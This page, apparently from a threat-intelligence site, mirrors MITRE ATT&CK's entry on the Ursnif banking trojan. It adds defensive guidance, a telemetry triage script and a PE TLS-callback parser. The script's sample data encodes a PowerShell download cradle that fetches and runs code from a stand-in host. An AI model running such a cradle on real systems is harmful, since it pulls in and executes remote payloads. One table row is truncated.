S0386: Ursnif
Ursnif is a banking trojan and variant of the Gozi malware observed being spread through various automated exploit kits, Spearphishing Attachments, and malicious links.[1][2] Ursnif is associated primarily with data theft, but variants also include components (backdoors, spyware, file injectors, etc.) capable of a wide variety of behaviors.[3]
Analyst context for executives and security teams
Ursnif matters because ATT&CK describes it as a Windows banking trojan associated primarily with data theft, with variants that can include backdoor, spyware, and file-injection capabilities. For leaders, the practical issue is not just “malware detection”; it is whether email-delivered or exploit-kit-delivered malware can collect credentials and local data, communicate over web traffic, stage and exfiltrate information, and hide through obfuscation or process injection before responders have enough evidence to scope the incident.
Executive priority
Prioritize Ursnif-related readiness where Windows endpoints, email-based delivery risk, credential theft, and sensitive local data exposure would create business disruption or audit concern. Executives should ask whether the organization can prove coverage across prevention, endpoint telemetry, web/C2 monitoring, credential-access investigation, and incident response scoping. Because TA551 is documented as using Ursnif and is described as financially motivated and email-focused, security leaders should also validate phishing resilience and malware triage workflows without assuming current exposure or activity.
Technical view
SOC and IR teams should validate Windows-focused visibility across the behaviors ATT&CK relates to Ursnif: registry, service, process, and system discovery; PowerShell and Visual Basic execution; WMI and COM abuse, including execution in hidden windows; persistence through Registry Run keys and service registration; process injection via TLS callbacks and process hollowing; credential API hooking, browser session hijacking, and screen capture; local data collection and staging in temp files; web-protocol C2 with encoded URLs and DGA-generated domains; proxy, multi-hop proxy, and P2P use; ingress tool transfer; exfiltration over the C2 channel via HTTP POST; file deletion after exfiltration; time-based sandbox evasion; removable-media replication; and tainted shared content. MITRE provides no official detection text for this software object, so detections should be behavior-led against the related techniques rather than relying only on static malware names or signatures.
Likely telemetry
- Windows endpoint process creation and command-line telemetry, including PowerShell, Visual Basic, WMI, service-query, process-query, and registry-query activity
- Endpoint detection telemetry for process injection, suspicious memory behavior, process hollowing indicators, and TLS callback-related execution where available
- Windows Registry access and modification events relevant to discovery, masquerading, and persistence (Run keys and service registration)
- File system telemetry for local data staging, encoded or encrypted files, dropped tools, deletion activity, and files placed in trusted-looking paths or shared locations
- Credential-access telemetry where available, including API hooking or suspicious access to authentication-related processes/functions
Detection direction
- Build coverage around ATT&CK behaviors related to Ursnif rather than the malware name alone, because the object notes multiple variants and components with a wide variety of behaviors.
- Correlate email delivery indicators with post-delivery Windows execution, especially script execution, WMI activity, registry/service/process discovery, and unexpected child processes from user-facing applications.
- Tune for suspicious discovery sequences on Windows endpoints, but account for administrative tools and software inventory products that may legitimately query services, processes, registry keys, and system information.
- Hunt for process-injection and process-hollowing patterns paired with outbound web traffic, file staging, or credential-access signals; these combinations are more useful than any single noisy event.
- Validate network monitoring for web-protocol C2 and proxy behavior, recognizing that malicious traffic may blend with normal HTTP/S activity and that multi-hop proxying can obscure infrastructure attribution.
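A behavior-led triage pass over the kind of endpoint telemetry the points above call for, as an added example that is not code from ATT&CK, Glexia or any Ursnif sample. It scores a host on combinations rather than single events: PowerShell started through WMI shortly after an Office process, an encoded PowerShell download cradle, a discovery command sequence, and a CreateRemoteThread injection followed by outbound HTTP(S) from the injected process. The records are constructed and Sysmon-shaped; the field names, the inventory-agent allowlist and the score weights are assumptions chosen for illustration.

```python
"""Behavior-led triage of Ursnif-style delivery and post-delivery chains.

Added example: not code from ATT&CK, Glexia or any Ursnif sample. Records are
constructed, Sysmon-shaped events (1 process create, 3 network connect,
8 CreateRemoteThread). Field names, the inventory-agent allowlist and the
score weights are assumptions chosen for illustration.
"""
import base64
import re
from collections import defaultdict
from datetime import datetime, timedelta

OFFICE = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
DISCOVERY = ("systeminfo", "tasklist", "sc query", "reg query", "whoami", "net view")
INVENTORY_PARENTS = {"inventoryagent.exe"}   # assumed benign inventory tool, for tuning only
CRADLE = re.compile(r"DownloadString|DownloadFile|Net\.WebClient|Invoke-Expression|\bIEX\b|FromBase64String", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Plaintext of a powershell -EncodedCommand/-enc argument (base64 of UTF-16LE), or None."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(events, window=timedelta(minutes=10)):
    """Score each host on combinations of behaviors; returns {host: (score, reasons)}."""
    by_host = defaultdict(list)
    for e in events:
        by_host[e["host"]].append(e)
    findings = {}
    for host, evs in by_host.items():
        evs.sort(key=lambda e: e["ts"])
        score, reasons, discovery, injected = 0, [], set(), {}
        office_starts = [e["ts"] for e in evs if e["event"] == 1 and basename(e["image"]) in OFFICE]
        for e in evs:
            if e["event"] == 1:
                img, parent, cmd = basename(e["image"]), basename(e["parent"]), e["cmdline"]
                after_office = any(t <= e["ts"] <= t + window for t in office_starts)
                if img == "powershell.exe" and parent == "wmiprvse.exe" and after_office:
                    score += 3
                    reasons.append("PowerShell started via WMI shortly after an Office process (T1047, T1059.001)")
                decoded = decode_encoded_command(cmd) if img == "powershell.exe" else None
                if decoded and CRADLE.search(decoded):
                    score += 3
                    reasons.append(f"encoded PowerShell download cradle: {decoded[:50]}... (T1027.010, T1105)")
                if parent not in INVENTORY_PARENTS:          # tune out expected inventory activity
                    discovery.update(d for d in DISCOVERY if d in cmd.lower())
            elif e["event"] == 8:                            # CreateRemoteThread: source image -> target pid
                injected[e["target_pid"]] = basename(e["image"])
            elif e["event"] == 3 and e["pid"] in injected and e["dst_port"] in (80, 443):
                score += 4
                reasons.append(f"{injected[e['pid']]} injected into pid {e['pid']}, which then "
                               f"connected to {e['dst']}:{e['dst_port']} (T1055, T1071.001)")
        if len(discovery) >= 3:
            score += 2
            reasons.append("discovery sequence: " + ", ".join(sorted(discovery)) + " (T1007, T1057, T1012, T1082)")
        if score:
            findings[host] = (score, reasons)
    return findings


# Constructed sample telemetry: one phished workstation (ws01) and one host running an inventory agent (ws02).
T0 = datetime(2024, 1, 1, 9, 0, 0)
ENC = base64.b64encode("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')"
                       .encode("utf-16-le")).decode()
TMP_EXE = r"C:\Users\u\AppData\Local\Temp\svchost.exe"   # masquerading name in a user-writable path
CMD, PS = r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"


def proc(host, secs, pid, image, parent, cmdline):
    return {"host": host, "ts": T0 + timedelta(seconds=secs), "event": 1, "pid": pid,
            "image": image, "parent": parent, "cmdline": cmdline}


SAMPLE_EVENTS = [
    proc("ws01", 0, 400, r"C:\Program Files\Microsoft Office\WINWORD.EXE", r"C:\Windows\explorer.exe",
         "WINWORD.EXE /n invoice.doc"),
    proc("ws01", 20, 512, PS, r"C:\Windows\System32\wbem\WmiPrvSE.exe", "powershell.exe -w hidden -enc " + ENC),
    *(proc("ws01", 70 + i, 600 + i, CMD, TMP_EXE, "cmd /c " + c)
      for i, c in enumerate(("systeminfo", "tasklist", "sc query"))),
    {"host": "ws01", "ts": T0 + timedelta(seconds=90), "event": 8, "image": TMP_EXE, "target_pid": 700},
    {"host": "ws01", "ts": T0 + timedelta(seconds=95), "event": 3, "pid": 700, "dst": "203.0.113.10", "dst_port": 443},
    # ws02: the same discovery commands, but from the allowlisted inventory agent
    *(proc("ws02", i, 800 + i, CMD, r"C:\Program Files\Inventory\InventoryAgent.exe", "cmd /c " + c)
      for i, c in enumerate(("systeminfo", "tasklist", "sc query"))),
]

if __name__ == "__main__":
    for host, (score, reasons) in analyze(SAMPLE_EVENTS).items():
        print(f"{host}: score {score}")
        for r in reasons:
            print("  -", r)
```

Running it reports only ws01, with four reasons and a score of 12; ws02 produces nothing because its discovery commands come from the allowlisted parent. The weights are deliberately arbitrary: the point is that each signal alone (an encoded PowerShell, a tasklist, a 443 connection) is noisy, and the combination within one host and one time window is what justifies opening an incident.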
Mitigation priorities
- Start with phishing and malicious-link controls, attachment detonation, user reporting, and email investigation workflows because ATT&CK describes Ursnif distribution through spearphishing attachments and malicious links.
- Harden Windows endpoints against script, WMI, and unauthorized process activity using least privilege, application control, and script-execution governance appropriate to the business environment.
- Strengthen credential protection and monitoring because related behavior includes Credential API Hooking and the malware is associated with data theft.
- Ensure EDR and centralized logging capture process, registry, file, memory-behavior, and network evidence needed for scoping, not just blocking alerts.
- Segment and monitor sensitive data locations, shared storage, and removable-media pathways where related techniques such as local data staging, tainted shared content, and removable-media replication are relevant.
Analyst notes and limits
This take is based only on the supplied ATT&CK S0386 fields, references, and relationships. The strongest defensive value comes from mapping Ursnif to its related behaviors: Windows execution and discovery, credential collection, evasion, C2 over web protocols, staging, and exfiltration. The official object does not specify tactics directly and does not provide official detection guidance, so local control validation should be technique-based.
The supplied ATT&CK object does not include official detection text, labels, or direct indicators of compromise; the only naming context is the alias entries carried in its external references (Dreambot, Gozi-ISFB, PE_URSNIF). It identifies Windows as the platform for Ursnif, while some related techniques list broader platforms; this summary treats Ursnif readiness as Windows-centered and uses non-Windows platform references only as technique context. No claim is made about active exploitation, current campaigns, customer exposure, or guaranteed detection.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1007 | System Service Discovery | Ursnif has gathered information about running services. (Citation: TrendMicro Ursnif Mar 2015) |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder | Ursnif has used Registry Run keys to establish automatic execution at system startup. (Citation: TrendMicro PE_URSNIF.A2) (Citation: TrendMicro BKDR_URSNIF.SM) |
| Enterprise | T1105 | Ingress Tool Transfer | |
| Enterprise | T1027.013 | Encrypted/Encoded File | Ursnif has used an XOR-based algorithm to encrypt Tor clients dropped to disk. (Citation: ProofPoint Ursnif Aug 2016) Ursnif droppers have also been delivered as password-protected zip files that execute base64 encoded PowerShell commands. (Citation: Bromium Ursnif Mar 2017) |
| Enterprise | T1090.003 | Multi-hop Proxy | |
| Enterprise | T1074.001 | Local Data Staging | Ursnif has used tmp files to stage gathered information. (Citation: TrendMicro Ursnif Mar 2015) |
| Enterprise | T1106 | Native API | Ursnif has used |
| Enterprise | T1497.003 | Time Based Checks | Ursnif has used a 30 minute delay after execution to evade sandbox monitoring tools. (Citation: TrendMicro Ursnif File Dec 2014) |
| Enterprise | T1559.001 | Component Object Model | Ursnif droppers have used COM objects to execute the malware's full executable payload. (Citation: Bromium Ursnif Mar 2017) |
| Enterprise | T1056.004 | Credential API Hooking | Ursnif has hooked APIs to perform a wide variety of information theft, such as monitoring traffic from browsers. (Citation: TrendMicro Ursnif Mar 2015) |
| Enterprise | T1057 | Process Discovery | Ursnif has gathered information about running processes. (Citation: TrendMicro Ursnif Mar 2015) (Citation: TrendMicro BKDR_URSNIF.SM) |
| Enterprise | T1041 | Exfiltration Over C2 Channel | Ursnif has used HTTP POSTs to exfil gathered information. (Citation: TrendMicro Ursnif Mar 2015) (Citation: FireEye Ursnif Nov 2017) (Citation: ProofPoint Ursnif Aug 2016) |
| Enterprise | T1132 | Data Encoding | Ursnif has used encoded data in HTTP URLs for C2. (Citation: ProofPoint Ursnif Aug 2016) |
| Enterprise | T1055.005 | Thread Local Storage | Ursnif has injected code into target processes via thread local storage callbacks. (Citation: TrendMicro Ursnif Mar 2015) (Citation: TrendMicro PE_URSNIF.A2) (Citation: FireEye Ursnif Nov 2017) |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | Ursnif has used crypto key information stored in the Registry to decrypt Tor clients dropped to disk. (Citation: ProofPoint Ursnif Aug 2016) |
| Enterprise | T1036.005 | Match Legitimate Resource Name or Location | Ursnif has used strings from legitimate system files and existing folders for its file, folder, and Registry entry names. (Citation: TrendMicro Ursnif Mar 2015) |
| Enterprise | T1005 | Data from Local System | Ursnif has collected files from victim machines, including certificates and cookies. (Citation: TrendMicro BKDR_URSNIF.SM) |
| Enterprise | T1027.010 | Command Obfuscation | Ursnif droppers execute base64 encoded PowerShell commands. (Citation: Bromium Ursnif Mar 2017) |
| Enterprise | T1113 | Screen Capture | Ursnif has used hooked APIs to take screenshots. (Citation: TrendMicro Ursnif Mar 2015) (Citation: TrendMicro BKDR_URSNIF.SM) |
| Enterprise | T1543.003 | Windows Service | Ursnif has registered itself as a system service in the Registry for automatic execution at system startup. (Citation: TrendMicro PE_URSNIF.A2) |
| Enterprise | T1059.001 | PowerShell | Ursnif droppers have used PowerShell in download cradles to download and execute the malware's full executable payload. (Citation: Bromium Ursnif Mar 2017) |
| Enterprise | T1071.001 | Web Protocols | Ursnif has used HTTPS for C2. (Citation: TrendMicro Ursnif Mar 2015) (Citation: FireEye Ursnif Nov 2017) (Citation: ProofPoint Ursnif Aug 2016) |
| Enterprise | T1070.004 | File Deletion | Ursnif has deleted data staged in tmp files after exfiltration. (Citation: TrendMicro Ursnif Mar 2015) |
| Enterprise | T1012 | Query Registry | |
| Enterprise | T1112 | Modify Registry | Ursnif has used Registry modifications as part of its installation routine. (Citation: TrendMicro BKDR_URSNIF.SM) (Citation: ProofPoint Ursnif Aug 2016) |
| Enterprise | T1568.002 | Domain Generation Algorithms | Ursnif has used a DGA to generate domain names for C2. (Citation: ProofPoint Ursnif Aug 2016) |
| Enterprise | T1059.005 | Visual Basic | Ursnif droppers have used VBA macros to download and execute the malware's full executable payload. (Citation: Bromium Ursnif Mar 2017) |
| Enterprise | T1082 | System Information Discovery | Ursnif has used Systeminfo to gather system information. (Citation: TrendMicro Ursnif Mar 2015) |
| Enterprise | T1090 | Proxy | Ursnif has used a peer-to-peer (P2P) network for C2. (Citation: NJCCIC Ursnif Sept 2016) (Citation: ProofPoint Ursnif Aug 2016) |
| Enterprise | T1047 | Windows Management Instrumentation | Ursnif droppers have used WMI classes to execute PowerShell commands. (Citation: Bromium Ursnif Mar 2017) |
| Enterprise | T1055.012 | Process Hollowing | Ursnif has used process hollowing to inject into child processes. (Citation: FireEye Ursnif Nov 2017) |
| Enterprise | T1185 | Browser Session Hijacking | Ursnif has injected HTML code into banking sites to steal sensitive online banking information (e.g., usernames and passwords). (Citation: TrendMicro BKDR_URSNIF.SM) |
| Enterprise | T1080 | Taint Shared Content | Ursnif has copied itself to and infected files in network drives for propagation. (Citation: TrendMicro Ursnif Mar 2015) (Citation: TrendMicro Ursnif File Dec 2014) |
| Enterprise | T1091 | Replication Through Removable Media | Ursnif has copied itself to and infected removable drives for propagation. (Citation: TrendMicro Ursnif Mar 2015) (Citation: TrendMicro Ursnif File Dec 2014) |
| Enterprise | T1564.003 | Hidden Window | Ursnif droppers have used COM properties to execute malware in hidden windows. (Citation: Bromium Ursnif Mar 2017) |
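A static triage check for the TLS callback injection row above (T1055.005), as an added example that is not code from ATT&CK, Glexia, FireEye or any Ursnif sample. Code registered in a PE's TLS directory runs before the image entry point, so a debugger or sandbox that only breaks or instruments at the entry point never sees it; listing the callbacks of a binary dropped in a temp path tells an analyst whether that blind spot applies. The parser reads the PE headers from bytes; build_sample_pe() constructs a minimal synthetic PE32+ image so the check runs offline. Header offsets follow the PE/COFF format, and no real sample is embedded.

```python
"""Static triage for TLS callback injection (T1055.005): list a PE's TLS callbacks.

Added example, not code from ATT&CK, Glexia, FireEye or any Ursnif sample.
tls_callbacks() parses a PE image from bytes; build_sample_pe() constructs a
minimal synthetic PE32+ so the check runs offline. Offsets follow the PE/COFF
format; no real sample is embedded.
"""
import struct

TLS_DIR_INDEX = 9  # IMAGE_DIRECTORY_ENTRY_TLS


def _sections(pe, first_hdr, count):
    """(VirtualAddress, VirtualSize, PointerToRawData, SizeOfRawData) for each section header."""
    out = []
    for i in range(count):
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", pe, first_hdr + 40 * i + 8)
        out.append((va, vsize, raw_ptr, raw_size))
    return out


def _rva_to_offset(rva, sections):
    for va, vsize, raw_ptr, raw_size in sections:
        if va <= rva < va + max(vsize, raw_size):
            return rva - va + raw_ptr
    raise ValueError(f"RVA {rva:#x} is not backed by any section")


def tls_callbacks(pe):
    """Return the TLS callback addresses (VAs) a PE file declares; [] if none.

    These run before the entry point, so analysis that only breaks or
    instruments at the entry point never sees what they do.
    """
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    opt = coff + 20
    magic = struct.unpack_from("<H", pe, opt)[0]
    if magic == 0x10B:    # PE32: ImageBase@28, NumberOfRvaAndSizes@92, directories@96, 4-byte pointers
        image_base = struct.unpack_from("<I", pe, opt + 28)[0]
        num_dirs, dirs, ptr_fmt, cb_field = struct.unpack_from("<I", pe, opt + 92)[0], opt + 96, "<I", 12
    elif magic == 0x20B:  # PE32+: ImageBase@24, NumberOfRvaAndSizes@108, directories@112, 8-byte pointers
        image_base = struct.unpack_from("<Q", pe, opt + 24)[0]
        num_dirs, dirs, ptr_fmt, cb_field = struct.unpack_from("<I", pe, opt + 108)[0], opt + 112, "<Q", 24
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    if num_dirs <= TLS_DIR_INDEX:
        return []
    tls_rva, tls_size = struct.unpack_from("<II", pe, dirs + 8 * TLS_DIR_INDEX)
    if tls_rva == 0 or tls_size == 0:
        return []
    sections = _sections(pe, opt + opt_size, nsections)
    # IMAGE_TLS_DIRECTORY.AddressOfCallBacks is the VA of a null-terminated pointer array
    cb_va = struct.unpack_from(ptr_fmt, pe, _rva_to_offset(tls_rva, sections) + cb_field)[0]
    if cb_va == 0:
        return []
    off, step, callbacks = _rva_to_offset(cb_va - image_base, sections), struct.calcsize(ptr_fmt), []
    while (va := struct.unpack_from(ptr_fmt, pe, off)[0]) != 0:
        callbacks.append(va)
        off += step
    return callbacks


def build_sample_pe(callback_rvas, image_base=0x140000000):
    """Constructed minimal PE32+ (one .tls section) for the demo; None = no TLS directory at all."""
    pe = bytearray(0x400)
    pe[:2] = b"MZ"
    struct.pack_into("<I", pe, 0x3C, 0x40)                   # e_lfanew
    pe[0x40:0x44] = b"PE\0\0"
    coff, opt, tls_rva, tls_file = 0x44, 0x58, 0x1000, 0x200
    struct.pack_into("<HH", pe, coff, 0x8664, 1)              # Machine=x64, NumberOfSections=1
    struct.pack_into("<H", pe, coff + 16, 240)                # SizeOfOptionalHeader for PE32+
    struct.pack_into("<H", pe, opt, 0x20B)
    struct.pack_into("<Q", pe, opt + 24, image_base)
    struct.pack_into("<I", pe, opt + 108, 16)                 # NumberOfRvaAndSizes
    if callback_rvas is not None:
        struct.pack_into("<II", pe, opt + 112 + 8 * TLS_DIR_INDEX, tls_rva, 40)
    sec = opt + 240                                           # first (only) section header
    pe[sec:sec + 8] = b".tls\0\0\0\0"
    struct.pack_into("<IIII", pe, sec + 8, 0x100, tls_rva, 0x200, tls_file)   # VirtualSize, VA, RawSize, RawPtr
    struct.pack_into("<Q", pe, tls_file + 24, image_base + tls_rva + 0x40)  # AddressOfCallBacks
    for i, rva in enumerate(callback_rvas or []):
        struct.pack_into("<Q", pe, tls_file + 0x40 + 8 * i, image_base + rva)
    return bytes(pe)


if __name__ == "__main__":
    sample = build_sample_pe([0x2000, 0x2010])
    print("TLS callbacks:", [hex(v) for v in tls_callbacks(sample)])
```

On the synthetic image the parser reports two callbacks at 0x140002000 and 0x140002010. A legitimate binary compiled with thread-local storage can also carry callbacks (the C runtime registers one), so a non-empty list is a triage prompt to disassemble the callback targets, not a verdict on its own.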
Groups, software, and campaigns
G0127: TA551
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see ATT&CK resources — Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.5 | | Current bundle | 01b386732b43… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] NJCCIC Ursnif Sept 2016: NJCCIC. (2016, September 27). Ursnif. Retrieved September 12, 2024.
- [2] ProofPoint Ursnif Aug 2016: Proofpoint Staff. (2016, August 25). Nightmare on Tor Street: Ursnif variant Dreambot adds Tor functionality. Retrieved June 5, 2019.
- [3] TrendMicro Ursnif Mar 2015: Caragay, R. (2015, March 26). URSNIF: The Multifaceted Malware. Retrieved June 5, 2019.
- [4] Dreambot (alias): (Citation: NJCCIC Ursnif Sept 2016) (Citation: ProofPoint Ursnif Aug 2016)
- [5] FireEye Ursnif Nov 2017: Vaish, A. & Nemes, S. (2017, November 28). Newly Observed Ursnif Variant Employs Malicious TLS Callback Technique to Achieve Process Injection. Retrieved June 5, 2019.
- [6] Gozi-ISFB (alias): (Citation: FireEye Ursnif Nov 2017) (Citation: ProofPoint Ursnif Aug 2016)
- [7] PE_URSNIF (alias): (Citation: TrendMicro Ursnif Mar 2015)
- [8] Ursnif (alias): (Citation: NJCCIC Ursnif Sept 2016)
- [9] mitre-attack S0386 (source record)
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.